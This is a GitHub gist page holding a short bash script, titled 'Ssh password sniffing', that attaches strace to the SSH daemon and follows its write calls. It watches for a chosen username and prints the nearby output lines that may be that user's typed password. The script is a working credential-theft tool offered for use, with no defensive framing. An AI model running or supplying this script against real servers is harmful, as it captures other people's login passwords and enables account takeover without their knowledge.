Skip to content

Instantly share code, notes, and snippets.

@vozlt

vozlt/sshsnoop.sh

Last active May 22, 2019 10:07
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save vozlt/dd59dea1cf380d35b704 to your computer and use it in GitHub Desktop.
Save vozlt/dd59dea1cf380d35b704 to your computer and use it in GitHub Desktop.
Download ZIP
Ssh password sniffing
Raw
sshsnoop.sh
#! /bin/bash
#
# Cheap technique. :) by YoungJoo.Kim <http://vozlt.com>
#
#
SNOOP_ID=$1
SSHD_PPID=$(pgrep -o sshd)
MATCH_ID=
MATCH_PID=
MATCH_ID_PID=
FIND_PASSWD=0
PASSWD_NEXT=15
FILTER_PASSWD_LEN_MIN=40
FILTER_PASSWD_LEN_MAX=80
SCOPE=10
SCOPE_MIN=
SCOPE_MAX=
LOOP_COUNT=0
((SCOPE_MIN=PASSWD_NEXT-SCOPE))
((SCOPE_MAX=PASSWD_NEXT+SCOPE))
if [ -z $SNOOP_ID ]; then
echo $"Usage: $0 {snoopid}"
exit 0
fi
strace -f -etrace=write -s 64 -p $SSHD_PPID 2>&1 | while read SSH
do
if [ $LOOP_COUNT -ge $SCOPE_MIN -a $LOOP_COUNT -le $SCOPE_MAX ]; then
MATCH_PID=$(echo $SSH 2>&1 | grep $MATCH_ID_PID | grep -v ssh-connection)
if [ -n "$MATCH_PID" -a ${#SSH} -lt $FILTER_PASSWD_LEN_MAX -a ${#SSH} -gt $FILTER_PASSWD_LEN_MIN ]; then
echo "MAY BE PASSWORD >>> $SSH"
fi
fi
if [ $LOOP_COUNT -eq $SCOPE_MAX ]; then
LOOP_COUNT=0
FIND_PASSWD=0
MATCH_ID=
fi
if [ $FIND_PASSWD -gt "0" ]; then
((FIND_PASSWD++))
((LOOP_COUNT++))
continue
fi
MATCH_ID=$(echo $SSH 2>&1 | grep $SNOOP_ID\")
if [ -n "$MATCH_ID" ]; then
echo "MAY BE USERID >>> $SSH"
MATCH_ID_PID=${SSH%%]*}
MATCH_ID_PID=${MATCH_ID_PID#[pid}
FIND_PASSWD=1
fi
done
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment